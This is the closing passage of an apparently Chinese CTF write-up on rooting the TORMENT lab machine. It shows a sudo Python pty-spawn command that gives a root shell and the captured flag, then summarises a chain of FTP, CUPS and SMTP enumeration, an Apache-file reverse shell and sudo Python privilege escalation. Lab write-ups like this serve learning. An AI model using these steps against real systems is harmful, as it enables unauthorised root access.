sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@TORMENT:/# cd /root
cd /root
root@TORMENT:~# ls -al
ls -al
total 44
drwx------  6 root root 4096 Jan  4  2019 .
drwxr-xr-x 23 root root 4096 Jan  4  2019 ..
-rw-------  1 root root   56 Jan  4  2019 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  2 root root 4096 Dec 23  2018 .cache
drwx------  5 root root 4096 Dec 31  2018 .config
drwxr-xr-x  3 root root 4096 Dec 31  2018 .local
drwxr-xr-x  2 root root 4096 Dec 24  2018 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
----------  1 root root 1329 Jan  4  2019 author-secret.txt
----------  1 root root  128 Dec 31  2018 proof.txt
root@TORMENT:~# cat proof.txt
cat proof.txt
Congrutulations on rooting TORMENT. I hope this box has been as fun for you as it has been for me. :-)

Until then, try harder!
root@TORMENT:~# 

成功提权并拿到flag

总结

本靶机首先通过ftp信息收集得到用户信息及id_rsa,然后通过CUPS收集用户表,再通过hexchat得到用户密码,ssh登录后更改apache文件,重启靶机后反弹shell,最后通过sudo提权。

  1. ftp匿名登录
  2. gobuster目录扫描
  3. curl创建用户表
  4. msf进行枚举smtp用户
  5. hexchat信息收集
  6. apache2文件修改
  7. sudo提权-Python提权
举报

相关推荐

0 条评论